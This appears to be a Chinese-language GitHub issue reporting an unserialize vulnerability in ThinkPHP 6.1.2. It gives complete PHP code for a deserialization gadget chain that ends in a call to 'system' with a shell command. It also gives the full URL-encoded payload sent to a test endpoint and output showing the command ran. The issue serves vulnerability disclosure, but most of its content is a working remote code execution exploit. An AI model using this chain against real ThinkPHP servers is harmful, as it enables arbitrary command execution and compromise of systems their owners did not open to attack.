[top-think/think] 6.1.2 依然存在 unserialize 漏洞

2023-12-11 447 views
  • 环境 php7.4-apache

  • 构造payload

    
    <?php

namespace think {

// Stand-ins for the framework classes of the same name. Only the property
// names, visibilities and declaration order matter here: serialize() emits
// them verbatim, private ones prefixed "\0think\Model\0" and protected ones
// "\0*\0" (seen as %00think%5CModel%00 / %00%2A%00 in the encoded payload
// further down). Presumably these mirror the framework's own property
// layout — verify against the framework source for the version under test.
abstract class Model
{
    private $lazySave = true;
    private $data = ['a' => 'b'];
    private $exists = true;
    protected $withEvent = false;
    protected $readonly = ['a'];
    protected $relationWrite;
    private $relation;
    private $origin = [];

    public function __construct($value)
    {
        // Self-reference: serialize() emits it as a back-reference (r:1;)
        // rather than a nested copy, which is why the payload contains
        // r:1; / r:11; instead of repeated objects.
        $this->relation = ['r' => $this];
        $this->origin = ["n" => $value];
        $this->relationWrite = ['r' =>
            ["n" => $value]
        ];
    }
}

class App
{
    // Left null; the encoded payload shows it as "request";N;
    protected $request;
}

// The two values a detection rule could key on: a fixed callable name in
// $filter and a shell command string in $param.
class Request
{
    protected $mergeParam = true;
    protected $param = ["echo $(pwd)"];
    protected $filter = "system";
}

}

namespace think\model {

use think\Model;

// Concrete subclass: the abstract Model above cannot be instantiated, and
// this is the outermost object of the payload (O:17:"think\model\Pivot").
class Pivot extends Model
{
}

}

namespace think\route {

use think\App;

// Property-shape stand-in; $url and $domain are fixed filler values, the
// interesting member is $route, which carries the next object in the chain.
class Url
{
    protected $url = "";
    protected $domain = "domain";
    protected $route;
    protected $app;

    public function __construct($route)
    {
        $this->route = $route;
        // A bare App whose $request stays null.
        $this->app = new App();
    }
}

}

namespace think\log {

// Property-shape stand-in; $logger carries the next object in the chain,
// $lazy and $log are fixed filler values.
class Channel
{
    protected $lazy = false;
    protected $logger;
    protected $log = [];

    public function __construct($logger)
    {
        $this->logger = $logger;
    }
}

}

namespace think\session {

// Property-shape stand-in. Note the second fixed callable name in the
// payload ($serialize = ["call_user_func"]), alongside Request::$filter —
// both are plain strings and therefore easy to match in a signature.
class Store
{
    protected $data;
    protected $serialize = ["call_user_func"];
    protected $id = "";

    public function __construct($data)
    {
        // Pairs the inner object with the literal string "param".
        $this->data = [$data, "param"];
    }
}

}

namespace {

    // Build the chain from the innermost object outward. The trailing
    // comment on each line is the author's label for that link; they look
    // like method names, presumably the ones each object is expected to
    // reach during unserialize()/destruction — not verified here.
    $request = new think\Request(); // param
    $store = new think\session\Store($request); // save
    $channel = new think\log\Channel($store); // call
    $url = new think\route\Url($channel); // toString
    $model = new think\model\Pivot($url); // __destruct

    // urlencode() because the serialized form contains NUL bytes in the
    // private/protected property names (the %00 sequences in the URL below),
    // which would not survive a raw query string. The receiving endpoint is
    // not shown on this page; the URL below suggests a test route that feeds
    // the `payload` query parameter to unserialize().
    echo urlencode(serialize($model)), PHP_EOL;

}



访问 [http://localhost:9000/public?payload=O%3A17%3A%22think%5Cmodel%5CPivot%22%3A8%3A%7Bs%3A21%3A%22%00think%5CModel%00lazySave%22%3Bb%3A1%3Bs%3A17%3A%22%00think%5CModel%00data%22%3Ba%3A1%3A%7Bs%3A1%3A%22a%22%3Bs%3A1%3A%22b%22%3B%7Ds%3A19%3A%22%00think%5CModel%00exists%22%3Bb%3A1%3Bs%3A12%3A%22%00%2A%00withEvent%22%3Bb%3A0%3Bs%3A11%3A%22%00%2A%00readonly%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A1%3A%22a%22%3B%7Ds%3A16%3A%22%00%2A%00relationWrite%22%3Ba%3A1%3A%7Bs%3A1%3A%22r%22%3Ba%3A1%3A%7Bs%3A1%3A%22n%22%3BO%3A15%3A%22think%5Croute%5CUrl%22%3A4%3A%7Bs%3A6%3A%22%00%2A%00url%22%3Bs%3A0%3A%22%22%3Bs%3A9%3A%22%00%2A%00domain%22%3Bs%3A6%3A%22domain%22%3Bs%3A8%3A%22%00%2A%00route%22%3BO%3A17%3A%22think%5Clog%5CChannel%22%3A3%3A%7Bs%3A7%3A%22%00%2A%00lazy%22%3Bb%3A0%3Bs%3A9%3A%22%00%2A%00logger%22%3BO%3A19%3A%22think%5Csession%5CStore%22%3A3%3A%7Bs%3A7%3A%22%00%2A%00data%22%3Ba%3A2%3A%7Bi%3A0%3BO%3A13%3A%22think%5CRequest%22%3A3%3A%7Bs%3A13%3A%22%00%2A%00mergeParam%22%3Bb%3A1%3Bs%3A8%3A%22%00%2A%00param%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A11%3A%22echo+%24%28pwd%29%22%3B%7Ds%3A9%3A%22%00%2A%00filter%22%3Bs%3A6%3A%22system%22%3B%7Di%3A1%3Bs%3A5%3A%22param%22%3B%7Ds%3A12%3A%22%00%2A%00serialize%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A14%3A%22call_user_func%22%3B%7Ds%3A5%3A%22%00%2A%00id%22%3Bs%3A0%3A%22%22%3B%7Ds%3A6%3A%22%00%2A%00log%22%3Ba%3A0%3A%7B%7D%7Ds%3A6%3A%22%00%2A%00app%22%3BO%3A9%3A%22think%5CApp%22%3A1%3A%7Bs%3A10%3A%22%00%2A%00request%22%3BN%3B%7D%7D%7D%7Ds%3A21%3A%22%00think%5CModel%00relation%22%3Ba%3A1%3A%7Bs%3A1%3A%22r%22%3Br%3A1%3B%7Ds%3A19%3A%22%00think%5CModel%00origin%22%3Ba%3A1%3A%7Bs%3A1%3A%22n%22%3Br%3A11%3B%7D%7D](http://localhost:9000/public?payload=O%3A17%3A%22think%5Cmodel%5CPivot%22%3A8%3A%7Bs%3A21%3A%22%00think%5CModel%00lazySave%22%3Bb%3A1%3Bs%3A17%3A%22%00think%5CModel%00data%22%3Ba%3A1%3A%7Bs%3A1%3A%22a%22%3Bs%3A1%3A%22b%22%3B%7Ds%3A19%3A%22%00think%5CModel%00exists%22%3Bb%3A1%3Bs%3A12%3A%22%00%2A%00withEvent%22%3Bb%3A0%3Bs%3A11%3A%22%00%2A%00readonly%22%3Ba%3A1%3A%7Bi%3A0%3B
s%3A1%3A%22a%22%3B%7Ds%3A16%3A%22%00%2A%00relationWrite%22%3Ba%3A1%3A%7Bs%3A1%3A%22r%22%3Ba%3A1%3A%7Bs%3A1%3A%22n%22%3BO%3A15%3A%22think%5Croute%5CUrl%22%3A4%3A%7Bs%3A6%3A%22%00%2A%00url%22%3Bs%3A0%3A%22%22%3Bs%3A9%3A%22%00%2A%00domain%22%3Bs%3A6%3A%22domain%22%3Bs%3A8%3A%22%00%2A%00route%22%3BO%3A17%3A%22think%5Clog%5CChannel%22%3A3%3A%7Bs%3A7%3A%22%00%2A%00lazy%22%3Bb%3A0%3Bs%3A9%3A%22%00%2A%00logger%22%3BO%3A19%3A%22think%5Csession%5CStore%22%3A3%3A%7Bs%3A7%3A%22%00%2A%00data%22%3Ba%3A2%3A%7Bi%3A0%3BO%3A13%3A%22think%5CRequest%22%3A3%3A%7Bs%3A13%3A%22%00%2A%00mergeParam%22%3Bb%3A1%3Bs%3A8%3A%22%00%2A%00param%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A11%3A%22echo+%24%28pwd%29%22%3B%7Ds%3A9%3A%22%00%2A%00filter%22%3Bs%3A6%3A%22system%22%3B%7Di%3A1%3Bs%3A5%3A%22param%22%3B%7Ds%3A12%3A%22%00%2A%00serialize%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A14%3A%22call_user_func%22%3B%7Ds%3A5%3A%22%00%2A%00id%22%3Bs%3A0%3A%22%22%3B%7Ds%3A6%3A%22%00%2A%00log%22%3Ba%3A0%3A%7B%7D%7Ds%3A6%3A%22%00%2A%00app%22%3BO%3A9%3A%22think%5CApp%22%3A1%3A%7Bs%3A10%3A%22%00%2A%00request%22%3BN%3B%7D%7D%7D%7Ds%3A21%3A%22%00think%5CModel%00relation%22%3Ba%3A1%3A%7Bs%3A1%3A%22r%22%3Br%3A1%3B%7Ds%3A19%3A%22%00think%5CModel%00origin%22%3Ba%3A1%3A%7Bs%3A1%3A%22n%22%3Br%3A11%3B%7D%7D)

返回（即 `echo $(pwd)` 的执行结果）
`/var/www/html/public`

回答